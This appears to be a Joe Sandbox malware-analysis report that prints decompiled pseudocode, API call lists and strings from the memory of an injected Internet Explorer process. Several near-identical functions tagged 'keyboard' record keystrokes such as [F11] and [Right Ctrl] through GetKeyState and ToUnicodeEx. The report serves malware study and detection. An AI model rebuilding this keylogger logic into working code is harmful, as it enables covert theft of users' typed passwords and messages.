ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F3], xrefs: 00C85BC1

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D68, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D68(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Right Ctrl]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Right Ctrl], xrefs: 00C85D6A
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85AC0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AC0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F11]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F11], xrefs: 00C85AC2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85CBE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CBE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Next Track]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Next Track], xrefs: 00C85CC0
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B8C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B8C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F22]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F22], xrefs: 00C85B8E
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85AAF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AAF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F10]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F10], xrefs: 00C85AB1
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85BAE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BAE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F24]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

